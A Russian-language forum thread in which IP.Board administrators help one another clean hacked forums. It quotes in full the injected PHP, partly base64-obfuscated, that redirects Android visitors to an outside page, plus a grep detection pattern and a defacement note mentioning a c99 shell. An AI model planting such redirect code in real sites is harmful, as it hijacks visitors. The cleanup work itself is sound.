ИБРовцы похоже еще спят http://forums.ibresource.ru/index.php?/topic/64826/ :)

если прошурстить у них в /cache/ наверняка и шелл найдется)

 

Патчи от 6 ноября 2012 для ИБР версий

http://ipbskins.ru/forum/topic10798.html/page__view__findpost__p__70490

Вот такие веселые коды прописались в ipsMember.php при удалении выскакивает ошибка форума ***/sources/base/ipsMember.php on line 3852, будем дальше искать

 

}

$mbrowser = function_exists("mobile_device_detect") ? mobile_device_detect() : false;

$is_session_alive = isset($_COOKIE['is_session_alive']) ? intval($_COOKIE['is_session_alive']) : 0;

if ($mbrowser != false && $mbrowser[1] == 'Android' && $is_session_alive < 3) {

setcookie("is_session_alive", ++$is_session_alive, time() + 3600 * 24 * 1, "/");

header(base64_decode("TG9jYXRpb246IGh0dHA6Ly93d3cua2lya2Rhdmlkc29uLmNvbS9qcy9mcC5odG1s"));

exit;

}

 

и в ipsRegistry.php - этот код снес

 

}

 

$mbrowser = mobile_device_detect();

$is_session_alive = isset($_COOKIE['is_session_alive']) ? intval($_COOKIE['is_session_alive']) : 0;

if ($mbrowser != false && $mbrowser[1] == 'Android' && $is_session_alive < 3) {

setcookie("is_session_alive", ++$is_session_alive, time() + 3600 * 24 * 1, "/");

header("Location: http://www.kirkdavidson.com/js/fp.html");

exit;

}

 

 

Если расшифровать вот это через base64 декодер TG9jYXRpb246IGh0dHA6Ly93d3cua2lya2Rhdmlkc29uLmNvbS9qcy9mcC5odG1s

получаем - Location: http://www.kirkdavidson.com/js/fp.html

 

Вот так ))

Зашел на один, а там:

Hackers had target адресфорума.net , They were using a 0-day exploit.

 

They were able to exploit the file public_html/hooks/boardIndexRecentTopics_540cbccd3003d5413b759ef888b45a23.php and replace it with a c99 shell.

 

Please do disable that plugin on all your IP.Boards.

 

:: Issued in public interest by ServerPolice Inc. htttp://serverpolice.org ::

 

 

PS : We'll be back soon ;)

 

Версия форум у них была, мне кажется, 3.4.2

Зашел на один, а там:

They were able to exploit the file public_html/hooks/boardIndexRecentTopics

Обновились а форум видно не до конца почистили http://ipbskins.ru/forum/topic10798.html/page__view__findpost__p__70621

Друзья, подскажите как вычистить остальное )) из ipsMember.php не могу удалить выскакивает ошибка

Какая ошибка?

В остальных файлов искали?

Шеллы удалили?

ssh на хостинге есть?

SSH есть. По поиску не искал, нашел только в соседнем файле sRegistry.php - и почистил вручную он там немного подругому был записал выше есть все коды которые там прописаны.

Как проверить на шеллы ? хочу поставить ХАнтера что то не ставится пока(

 

Код ошибки такой Parse error: syntax error, unexpected $end, expecting T_FUNCTION in ******/sources/base/ipsMember.php on line 3852

Ранее был вирус тот что из 128 картинки все что мог вроде почистил.

Патчи безопасности стоят

Изменено 28 января 201312 г пользователем Ultima

SSH есть.

Перейдите в корень форума и выполните команду. В found.txt запишутся все найденные совпадения.

find . -name '*.php' | xargs grep -Pin "mobile_device_detect|kirkdavidson" > ./found.txt

 

Код ошибки такой Parse error: syntax error, unexpected $end, expecting T_FUNCTION in ******/sources/base/ipsMember.php on line 3852

Что-то лишнее удалили. Файл прикрепите.

 

Патчи безопасности стоят

Кроме патчей, нужно еще чистить изменения и левые файлы которые могли попасти на форуме до патча.

Перейдите в корень форума и выполните команду. В found.txt запишутся все найденные совпадения.

find . -name '*.php' | xargs grep -Pin "mobile_device_detect|kirkdavidson" > ./found.txt

 

 

Что-то лишнее удалили. Файл прикрепите.

 

 

Кроме патчи, нужно еще чистить изменения и левые файлы которые могли попасти на форуме до их установке.

 

А как почистить изменения и левый файлы ?

Файлы не могу залить давай на почту скину ?

Использовано 0байт из разрешенных вам 50К для загрузки файлов (максимальный размер файла: 50К)

 

 

Вот вся папка https://www.dropbox.com/s/7f7er9o703gh5f3/base.rar

 

 

Пишет The -P option is not supported

А как почистить изменения и левый файлы ?

Вручную, либо из бэкапа. Но если из бэкапа, прежде чем их заливать желательно проверить.

ipsMember.php и ipsRegistry.php

ipsMember.php и ipsRegistry.php

Это мне ?

Народ пишет что еще ipscontroller.php нужно заменить и обновить кеш стилей чтобы не выводило ошибок

 

Вручную, либо из бэкапа. Но если из бэкапа желательно прежде чем их заливать - проверить.

бэкапа к сожалению нет :) Если и есть то наверное старый.

Это мне ?

Народ пишет что еще ipscontroller.php нужно заменить и обновить кеш стилей чтобы не выводило ошибок

Да. В контроллере ничего нет, и кеши стилей в вашем случае тоже не причем. Код находится в ipsRegistry и вызывается он там же и в ipsMembers.

Да. В контроллере ничего нет, и кеши стилей в вашем случае тоже не причем. Код находится в ipsRegistry и вызывается он там же и в ipsMembers.

Соверженно верно этот же код ?

@Ultima, я вам дал очищенные файлы, можете сравнить их с теми, что у вас в архиве (вредоносный код находится в конце файлов). Дальше уже офф топ.

@Ultima, я вам дал очищенные файлы, можете сравнить их с теми, что у вас в архиве (вредоносный код находится в конце файлов). Дальше уже офф топ.

Спасибо, большое заметил что не доконца почистил от кода файлы.

Перезалил те что Вы мне дали сейчас форум работает ошибок нет.

Еще раз спасибо!!!

А человек наверное и не знает что у него такое добро на сайте живет ))

www.kirkdavidson.com/contact/

оформим ему посылку по контактам?)))

Мы ему письмо уже отправили ))

kirk@kirkdavidson.com

https://www.facebook.com/kirkdavidson

Domain Name: KIRKDAVIDSON.COM

Registrar: NEW DREAM NETWORK, LLC

 

Осталось разобратся есть ли еще зараженные файлы на форуме.

 

По поиску больше ничего подобного не нашел, поставил clamscan на сервен он тоже ничего не нашел, думаю еще проверить на руткиты.

Как обычно шеллы ищут ?

 

Вот сканер тоже полезный http://sitecheck.sucuri.net/scanner/